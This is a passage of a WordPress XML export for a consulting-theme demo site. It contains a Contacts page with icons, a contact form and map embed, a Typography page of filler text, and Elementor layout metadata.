15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:3:"gap";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:2;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:13:"border_border";i:1;s:12:"border_width";i:1;s:12:"border_color";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:14:"padding_mobile";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:9;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:2;}}s:5:"style";a:2:{s:18:"section_style_icon";a:4:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;s:10:"icon_space";i:3;}s:21:"section_style_content";a:12:{s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;s:17:"text_align_mobile";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:2;}}}}s:27:"wp-widget-mc4wp_form_widget";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Contacts</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/contacts/</link>
		<pubDate>Fri, 04 Sep 2020 09:27:58 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=455</guid>
		<description></description>
		<content:encoded><![CDATA[contact details	        <h2>Our Contacts</h2>	    
		Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.		
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>	        
				<h6>Visit Us Daily</h6>				<p>411 University St, Seattle, USA</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>	        
				<h6><a href="tel:+1-800-456-478-23">Call Us 24/7</a></h6>				<p>+1-800-456-478-23</p>			
		        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>	        
				<h6><a href="mailto: maxbizz@mail.com">Mail Us</a></h6>				<p>maxbizz@mail.com</p>			
										<img width="849" height="878" src="https://maxbizz.s3.amazonaws.com/images/image-contacts.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image-contacts.png 849w, https://maxbizz.s3.amazonaws.com/images/image-contacts-290x300.png 290w, https://maxbizz.s3.amazonaws.com/images/image-contacts-768x794.png 768w" sizes="(max-width: 849px) 100vw, 849px" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-consulting/wp-admin/admin-ajax.php#wpcf7-f1319-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="1319" />
<input type="hidden" name="_wpcf7_version" value="5.3" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f1319-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<h4>Ready to Get Started?</h4>
<p><input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /></p>
<p><input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /></p>
<p><input type="text" name="your-site" value="" size="40" aria-invalid="false" placeholder="Website" /></p>
<p><textarea name="your-message" cols="40" rows="10" aria-invalid="false" placeholder="Message..."></textarea></p>
<p><button type="submit">Send Message</button>
</form>		
			<iframe frameborder="0" scrolling="no" marginheight="0" marginwidth="0" src="https://maps.google.com/maps?q=411%20University%20St%2C%20Seattle%2C%20USA&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near" title="411 University St, Seattle, USA" aria-label="411 University St, Seattle, USA"></iframe>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>455</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 09:27:58]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 09:27:58]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[contacts]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[457]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"86d48d0","elType":"section","settings":{"gap":"extended","structure":"21","padding":{"unit":"px","top":"116","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"1feabce","elType":"column","settings":{"_column_size":33,"_inline_size":43,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"030e332","elType":"widget","settings":{"sub":"contact details","title":"Our Contacts","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"588e854","elType":"widget","settings":{"editor":"Give us a call or drop by anytime, we endeavour to answer all enquiries within 24 hours on business days. We will be happy to answer your questions.","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"130afd7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title":"Visit Us Daily","header_size":"h6","des":"411 University St, Seattle, USA","link":{"url":"","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":27,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#4B83FC1A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ab1650","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title":"Call Us 24\/7","header_size":"h6","des":"+1-800-456-478-23","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":22,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#4B83FC1A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"f3cf3dd","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title":"Mail Us","header_size":"h6","des":"maxbizz@mail.com","link":{"url":"mailto: maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""},"is_line":"","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"icon_space":{"unit":"px","size":76,"sizes":[]},"icon_size":{"unit":"px","size":24,"sizes":[]},"icon_bg_width":{"unit":"px","size":60,"sizes":[]},"radius_box":{"unit":"%","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"icon_bg":"#4B83FC1A","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":0,"spread":0,"color":""},"title_space_top":{"unit":"px","size":6,"sizes":[]},"title_space_bottom":{"unit":"px","size":1,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600"},"elements":[],"widgetType":"iiconbox2"}],"isInner":false},{"id":"89ca7e2","elType":"column","settings":{"_column_size":66,"_inline_size":56.66499999999999914734871708787977695465087890625,"_inline_size_tablet":100},"elements":[{"id":"4fb28a7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image-contacts.png","id":465},"image_size":"full","_margin":{"unit":"px","top":"-46","right":"-120","bottom":"0","left":"-70","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a5be57a","elType":"section","settings":{"margin":{"unit":"px","top":"-245","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-100","right":0,"bottom":"0","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"-10","right":0,"bottom":"50","left":0,"isLinked":false},"z_index":1},"elements":[{"id":"574fa46","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"12e32dc","elType":"widget","settings":{"cf7":"1319","_padding":{"unit":"px","top":"60","right":"60","bottom":"60","left":"60","isLinked":true},"_padding_mobile":{"unit":"px","top":"50","right":"20","bottom":"50","left":"20","isLinked":false},"_background_background":"classic","_background_color":"#FFFFFF","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"ictf7"}],"isInner":false}],"isInner":false},{"id":"de4c36a","elType":"section","settings":{"layout":"full_width","margin":{"unit":"px","top":"-60","right":0,"bottom":"0","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"","right":0,"bottom":"","left":0,"isLinked":true},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false}},"elements":[{"id":"f31c287","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"3e66202","elType":"widget","settings":{"address":"411 University St, Seattle, USA","height":{"unit":"px","size":520,"sizes":[]},"css_filters_css_filter":"custom","css_filters_saturate":{"unit":"px","size":0,"sizes":[]}},"elements":[],"widgetType":"google_maps"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:3:"sub";i:1;s:5:"title";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:4:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:14:"subtitle_style";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:3;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:3;s:5:"title";i:3;s:11:"header_size";i:3;s:3:"des";i:3;s:4:"link";i:3;}}s:5:"style";a:3:{s:17:"style_box_section";a:2:{s:7:"is_line";i:3;s:7:"icon_bg";i:3;}s:18:"style_icon_section";a:6:{s:10:"icon_space";i:3;s:9:"icon_size";i:3;s:13:"icon_bg_width";i:3;s:10:"radius_box";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:21:"style_content_section";a:5:{s:15:"title_space_top";i:3;s:18:"title_space_bottom";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:4;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:4;s:19:"_inline_size_tablet";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:1;s:13:"margin_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:1;s:10:"image_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:7:"_margin";i:1;s:14:"_margin_tablet";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:1;s:6:"layout";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:6:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;s:6:"margin";i:2;s:13:"margin_tablet";i:2;s:13:"margin_mobile";i:2;s:7:"z_index";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:3:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}s:19:"_section_background";a:2:{s:22:"_background_background";i:1;s:17:"_background_color";i:1;}s:15:"_section_border";a:3:{s:14:"_border_radius";i:1;s:27:"_box_shadow_box_shadow_type";i:1;s:22:"_box_shadow_box_shadow";i:1;}}}}s:11:"google_maps";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:11:"section_map";a:2:{s:7:"address";i:1;s:6:"height";i:1;}}s:5:"style";a:1:{s:17:"section_map_style";a:2:{s:22:"css_filters_css_filter";i:1;s:20:"css_filters_saturate";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Typography</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/typography/</link>
		<pubDate>Mon, 07 Sep 2020 04:22:37 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=471</guid>
		<description></description>
		<content:encoded><![CDATA[<h1>Heading 1</h1>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h2>Heading 2</h2>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h3>Heading 3</h3>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Heading 4</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h5>Heading 5</h5>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h6>Heading 6</h6>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>IV Columns</h4>		
		<p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p><p>A faceting effect livens up and interrupts the cubism that sets the morphology of the West system apart from the cliches.</p>		
			<h4>III Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p><p>Characterised by its suitability for use in a wide range of different contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue.</p>		
			<h4>II Columns</h4>		
		<p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p><p>Characterised by its suitability for use in a wide range of contemporary and traditional arrangements, West also features glints of pure creativity, such as the chaise longue, available in pentagonal or hexagonal form and the elements that stand out for their striking backrests in saddle hide.</p>		
			<h4>Text Elements</h4>		
		<p>Three of these curves describe an initial Covid-related spike in demand, and three describe a short-term hit. Where each group begins to diverge, however, is in what’s likely to happen to demand over the next several years. Think, for example, of personal computer monitors or other types of goods that were declining pre-pandemic and fall into the “short-term spike, long-term decline” archetype. The story is different for online grocery shopping and collaboration services like Zoom (short-term spike, long-term growth), both of which were growing steadily before the pandemic. <em>Experimentation during the crisis has convinced more and more customers that ordering or meeting online makes sense, pulling forward demand that will likely stick</em>.</p>		
			<h4>Highlights</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape will demand take as the economic downturn.</p>		
			<h4>Dropcaps</h4>		
		<p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p><p>Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies, recapitalize them and plan for a longer-term recovery. Making smart decisions requires coming to a quick understanding of two things: What impact is Covid-19 having on customer demand right now, and what sort of shape.</p>		
			<h4>Listings</h4>		
		<ol><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ol><ul><li>Customer Experience</li><li>New Business Innovation</li><li>Sales and Marketing</li></ul>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Customer Experience
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										New Business Innovation
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 490.688 490.688" style="enable-background:new 0 0 490.688 490.688;" xml:space="preserve">
<path style="fill:#FFC107;" d="M472.328,120.529L245.213,347.665L18.098,120.529c-4.237-4.093-10.99-3.975-15.083,0.262  c-3.992,4.134-3.992,10.687,0,14.82l234.667,234.667c4.165,4.164,10.917,4.164,15.083,0l234.667-234.667  c4.237-4.093,4.354-10.845,0.262-15.083c-4.093-4.237-10.845-4.354-15.083-0.262c-0.089,0.086-0.176,0.173-0.262,0.262  L472.328,120.529z"></path>
<path d="M245.213,373.415c-2.831,0.005-5.548-1.115-7.552-3.115L2.994,135.633c-4.093-4.237-3.975-10.99,0.262-15.083  c4.134-3.992,10.687-3.992,14.82,0l227.136,227.115l227.115-227.136c4.093-4.237,10.845-4.354,15.083-0.262  c4.237,4.093,4.354,10.845,0.262,15.083c-0.086,0.089-0.173,0.176-0.262,0.262L252.744,370.279  C250.748,372.281,248.039,373.408,245.213,373.415z"></path>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										Sales and Marketing
									</li>
						</ul>
					<ul>
							<li>
